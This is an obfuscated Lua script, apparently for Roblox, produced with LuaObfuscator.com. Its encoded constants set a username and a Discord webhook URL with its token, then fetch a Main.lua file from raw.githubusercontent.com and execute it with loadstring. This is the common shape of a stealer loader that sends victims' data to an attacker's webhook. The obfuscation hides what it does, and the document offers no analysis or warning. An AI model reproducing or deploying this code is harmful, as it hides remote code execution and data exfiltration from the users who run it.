--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.7) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v68=0;while true do if (v68==0) then v19=v0(v3(v30,1,1));return "";end end else local v69=v2(v0(v30,16));if v19 then local v77=0;local v78;while true do if (v77==1) then return v78;end if (v77==0) then v78=v5(v69,v19);v19=nil;v77=1;end end else return v69;end end end);local function v20(v31,v32,v33)if v33 then local v70=0;local v71;while true do if (v70==(0 -0)) then v71=(v31/(((1070 -(68 + 997)) -3)^(v32-((1272 -(226 + 1044)) -1))))%(2^(((v33-(1 -0)) -(v32-((8 -6) -1))) + (620 -((672 -(32 + 85)) + 64)))) ;return v71-(v71%(932 -(857 + 74))) ;end end else local v72=(2205 -(1523 + 114)) -(367 + 201) ;local v73;while true do if (v72==(0 + 0)) then v73=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v73 + v73))>=v73) and (1 + 0)) or (877 -(282 + 595)) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 1 + 1 ;return (v36 * (1213 -(892 + 65))) + v35 ;end local function v23()local v37=0 -(0 -0) ;local v38;local v39;local v40;local v41;while true do if (v37==(0 -0)) then v38,v39,v40,v41=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (7 -3) ;v37=1;end if (v37==(351 -((157 -70) + 263))) then return (v41 * (16777396 -(67 + 113))) + (v40 * (66488 -(802 + 110 + 40))) + (v39 * 256) + v38 ;end end end local function v24()local v42=v23();local v43=v23();local v44=998 -((1353 -(145 + 293)) + 82) ;local v45=(v20(v43,2 -1 ,20) * ((2 + 0)^(462 -(44 + 386)))) + v42 ;local v46=v20(v43,27 -6 ,1218 -(1069 + (1604 -(998 + 488))) );local v47=((v20(v43,72 -40 )==(1 -0)) and  -(1 + 0)) or (1 -(0 + 0)) ;if (v46==(0 + 0)) then if (v45==(791 -(368 + 423))) then return v47 * (0 -0) ;else v46=19 -(10 + 8) ;v44=0 -0 ;end elseif (v46==(2489 -(416 + 26))) then return ((v45==0) and (v47 * (1/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(440 + 583) ) * (v44 + (v45/((3 -(1 + 0))^52))) ;end local function v25(v48)local v49=772 -(201 + (1456 -(261 + 624))) ;local v50;local v51;while true do if (v49==3) then return v6(v51);end if (v49==1) then v50=v3(v16,v18,(v18 + v48) -(1139 -(116 + (1815 -793))) );v18=v18 + v48 ;v49=8 -6 ;end if (v49==((1082 -(1020 + 60)) + (1423 -(630 + 793)))) then v51={};for v79=3 -2 , #v50 do v51[v79]=v2(v1(v3(v50,v79,v79)));end v49=(4 + 6) -7 ;end if (v49==(859 -(814 + 45))) then v50=nil;if  not v48 then v48=v23();if (v48==(0 -0)) then return "";end end v49=1 + 0 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=1990 -(582 + 1408) ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if ((3 -2)~=v52) then else v55=nil;v56=nil;v52=128 -(116 + 10) ;end if (v52==(4 -0)) then while true do if (v53~=2) then else v58=nil;v59=nil;v53=1 + 2 ;end if (v53~=1) then else v56=nil;v57=nil;v53=740 -(542 + 196) ;end if (v53==3) then v60=nil;while true do if (v54~=(0 -0)) then else v55={};v56={};v57={};v58={v55,v56,nil,v57};v54=1;end if (v54==(1 + 1)) then local v104=0 + 0 ;local v105;while true do if (v104==(780 -(162 + 618))) then v105=0 + 0 ;while true do if (0==v105) then for v130=2 -1 ,v23() do local v131=0 + 0 ;local v132;local v133;local v134;while true do if (v131~=(0 -0)) then else v132=0 -0 ;v133=nil;v131=1 + 0 ;end if (v131==(1637 -(1373 + 263))) then v134=nil;while true do if (v132==(1001 -(451 + 549))) then while true do if (v133~=0) then else v134=v21();if (v20(v134,1 + 0 ,1 -0 )~=0) then else local v169=0 -0 ;local v170;local v171;local v172;local v173;local v174;local v175;while true do if (v169~=(1386 -(746 + 638))) then else v174=nil;v175=nil;v169=2 + 1 ;end if (v169~=(4 -3)) then else v172=nil;v173=nil;v169=2 -0 ;end if (v169==(1 + 2)) then while true do if (v170==1) then local v176=977 -(553 + 424) ;while true do if (v176==(342 -(218 + 123))) then v170=2 + 0 ;break;end if (v176~=(1581 -(1535 + 46))) then else v173=nil;v174=nil;v176=1;end end end if (v170==(2 + 0)) then v175=nil;while true do if (v171==(0 + 0)) then v172=0;v173=nil;v171=561 -(306 + 254) ;end if (v171~=2) then else while true do if (v172==1) then local v179=0 + 0 ;local v180;while true do if (v179==(0 + 0)) then v180=0 -0 ;while true do if ((1467 -(899 + 568))==v180) then local v190=0;while true do if (v190~=(2 -1)) then else v180=1 + 0 ;break;end if (v190==(0 -0)) then v175={v22(),v22(),nil,nil};if (v173==(290 -(60 + 230))) then local v192=753 -(239 + 514) ;local v193;local v194;local v195;while true do if (v192==1) then v195=nil;while true do if (v193==(572 -(426 + 146))) then v194=0 + 0 ;v195=nil;v193=1457 -(282 + 1174) ;end if (v193~=(812 -(569 + 242))) then else while true do if (0==v194) then v195=0;while true do if ((0 -0)~=v195) then else v175[3]=v22();v175[1 + 3 ]=v22();break;end end break;end end break;end end break;end if (v192~=(1024 -(706 + 318))) then else v193=0;v194=nil;v192=2 -1 ;end end elseif (v173==1) then v175[1205 -(373 + 829) ]=v23();elseif (v173==(1253 -(721 + 530))) then v175[734 -(476 + 255) ]=v23() -((1273 -(945 + 326))^(39 -23)) ;elseif (v173~=3) then else local v202=0;local v203;while true do if (v202~=0) then else v203=0 + 0 ;while true do if (v203==(700 -(271 + 429))) then v175[5 -2 ]=v23() -((2 + 0)^16) ;v175[1504 -(1408 + 92) ]=v22();break;end end break;end end end v190=1087 -(461 + 625) ;end end end if (v180==(337 -(144 + 192))) then v172=218 -(42 + 174) ;break;end end break;end end end if (v172==3) then if (v20(v174,3 + 0 ,3)==(1289 -(993 + 295))) then v175[2 + 2 ]=v60[v175[4]];end v55[v130]=v175;break;end if (v172==2) then local v182=0;local v183;local v184;while true do if (v182==(0 + 0)) then v183=1171 -(418 + 753) ;v184=nil;v182=1581 -(1183 + 397) ;end if (v182==(2 -1)) then while true do if (v183==(0 + 0)) then v184=0 + 0 ;while true do if ((0 + 0)~=v184) then else local v191=0 + 0 ;while true do if (v191==(0 + 0)) then if (v20(v174,1 + 0 ,1)==(1934 -(565 + 1368))) then v175[2]=v60[v175[531 -(406 + 123) ]];end if (v20(v174,1771 -(1749 + 20) ,2 -0 )~=1) then else v175[3]=v60[v175[3]];end v191=1 + 0 ;end if (v191==(1323 -(1249 + 73))) then v184=1;break;end end end if ((1 + 0)~=v184) then else v172=1148 -(466 + 679) ;break;end end break;end end break;end end end if (v172==(856 -(564 + 292))) then local v185=0 -0 ;local v186;while true do if (v185==0) then v186=0 -0 ;while true do if (v186~=(2 -1)) then else v172=1;break;end if (v186==(1900 -(106 + 1794))) then v173=v20(v134,2,307 -(244 + 60) );v174=v20(v134,4,5 + 1 );v186=1;end end break;end end end end break;end if ((1 + 0)==v171) then local v178=1001 -(938 + 63) ;while true do if (v178==1) then v171=2 + 0 ;break;end if (v178~=(0 + 0)) then else local v187=0 -0 ;while true do if ((1 + 0)==v187) then v178=2 -1 ;break;end if (v187==0) then v174=nil;v175=nil;v187=1;end end end end end end break;end if (v170~=(1613 -(1565 + 48))) then else local v177=0;while true do if (v177==0) then v171=0;v172=nil;v177=115 -(4 + 110) ;end if (v177==1) then v170=585 -(57 + 527) ;break;end end end end break;end if (v169==0) then v170=1427 -(41 + 1386) ;v171=nil;v169=1139 -(782 + 356) ;end end end break;end end break;end if (v132~=(103 -(17 + 86))) then else v133=0;v134=nil;v132=1;end end break;end end end for v135=1 + 0 ,v23() do v56[v135-(1 -0) ]=v28();end v105=2 -1 ;end if (v105==(2 -1)) then return v58;end end break;end end end if ((167 -(122 + 44))==v54) then v59=v23();v60={};for v107=1 -0 ,v59 do local v108=1875 -(157 + 1718) ;local v109;local v110;local v111;while true do if ((0 -0)==v108) then v109=0 + 0 ;v110=nil;v108=3 -2 ;end if ((1 + 0)==v108) then v111=nil;while true do if ((1 -0)~=v109) then else if (v110==(66 -(30 + 35))) then v111=v21()~=0 ;elseif (v110==(2 + 0)) then v111=v24();elseif (v110~=(1021 -(697 + 321))) then else v111=v25();end v60[v107]=v111;break;end if (v109~=0) then else local v138=1257 -(1043 + 214) ;while true do if ((2 -1)==v138) then v109=1;break;end if (v138==(0 -0)) then v110=v21();v111=nil;v138=3 -2 ;end end end end break;end end end v58[1215 -(323 + 889) ]=v21();v54=5 -3 ;end end break;end if (v53~=(580 -(361 + 219))) then else local v97=320 -(53 + 267) ;while true do if (v97==(0 -0)) then v54=1227 -(322 + 905) ;v55=nil;v97=1 + 0 ;end if (v97==(414 -(15 + 398))) then v53=983 -(18 + 964) ;break;end end end end break;end if (v52==2) then v57=nil;v58=nil;v52=11 -8 ;end if (v52==(2 + 1)) then v59=nil;v60=nil;v52=4;end if (v52==(0 + 0)) then v53=850 -(20 + 830) ;v54=nil;v52=1;end end end local function v29(v61,v62,v63)local v64=0;local v65;local v66;local v67;while true do if (v64==0) then v65=v61[1];v66=v61[2];v64=1;end if (v64==1) then v67=v61[3];return function(...)local v81=v65;local v82=v66;local v83=v67;local v84=v27;local v85=1;local v86= -1;local v87={};local v88={...};local v89=v12("#",...) -1 ;local v90={};local v91={};for v95=0,v89 do if (v95>=v83) then v87[v95-v83 ]=v88[v95 + 1 ];else v91[v95]=v88[v95 + 1 ];end end local v92=(v89-v83) + 1 ;local v93;local v94;while true do local v96=0;while true do if (v96==0) then v93=v81[v85];v94=v93[1];v96=1;end if (v96==1) then if (v94<=5) then if (v94<=2) then if (v94<=0) then v91[v93[2]]=v93[3];elseif (v94==1) then local v139=v93[2];v91[v139]=v91[v139](v13(v91,v139 + 1 ,v86));else do return;end end elseif (v94<=3) then if (v91[v93[2]]==v93[4]) then v85=v85 + 1 ;else v85=v93[3];end elseif (v94>4) then v63[v93[3]]=v91[v93[2]];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v93[3];v85=v85 + 1 ;v93=v81[v85];v63[v93[3]]=v91[v93[2]];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v93[3];v85=v85 + 1 ;v93=v81[v85];v85=v93[3];else v91[v93[2]]=v93[3]~=0 ;end elseif (v94<=8) then if (v94<=6) then local v114;local v115,v116;local v117;local v118;v91[v93[2]]=v63[v93[3]];v85=v85 + 1 ;v93=v81[v85];v118=v93[2];v117=v91[v93[3]];v91[v118 + 1 ]=v117;v91[v118]=v117[v93[4]];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v93[3];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v93[3]~=0 ;v85=v85 + 1 ;v93=v81[v85];v118=v93[2];v115,v116=v84(v91[v118](v13(v91,v118 + 1 ,v93[3])));v86=(v116 + v118) -1 ;v114=0;for v128=v118,v86 do local v129=0;while true do if (v129==0) then v114=v114 + 1 ;v91[v128]=v115[v114];break;end end end v85=v85 + 1 ;v93=v81[v85];v118=v93[2];v91[v118]=v91[v118](v13(v91,v118 + 1 ,v86));v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]();v85=v85 + 1 ;v93=v81[v85];v85=v93[3];elseif (v94>7) then local v147=v93[2];local v148,v149=v84(v91[v147](v13(v91,v147 + 1 ,v93[3])));v86=(v149 + v147) -1 ;local v150=0;for v159=v147,v86 do v150=v150 + 1 ;v91[v159]=v148[v150];end else v85=v93[3];end elseif (v94<=10) then if (v94==9) then v91[v93[2]]();else local v152=0;local v153;local v154;while true do if (v152==1) then v91[v153 + 1 ]=v154;v91[v153]=v154[v93[4]];break;end if (v152==0) then v153=v93[2];v154=v91[v93[3]];v152=1;end end end elseif (v94>11) then v91[v93[2]]=v63[v93[3]];else v63[v93[3]]=v91[v93[2]];end v85=v85 + 1 ;break;end end end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403373O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6B34662O742F522F6D61696E2F4D61696E2E6C756103083O00557365724E616D65030E3O006369737469616E6F626F6461646F03073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3130373638303338363235323831363339342F756D664B474137613035634E4F546B374B75562D3778666C7165575A50597250464A2D4D76514F714F46707569303178553130614A736D43744C37445648774B6E666A4B00153O00124O00013O0026033O000C000100020004073O000C000100120C000100033O001206000200043O00202O00020002000500122O000400066O000500016O000200056O00013O00024O00010001000100044O001400010026033O0001000100010004073O0001000100122O000100083O001205000100073O00122O0001000A3O00122O000100093O00124O00023O00044O000100012O00023O00017O00",v9(),...);end
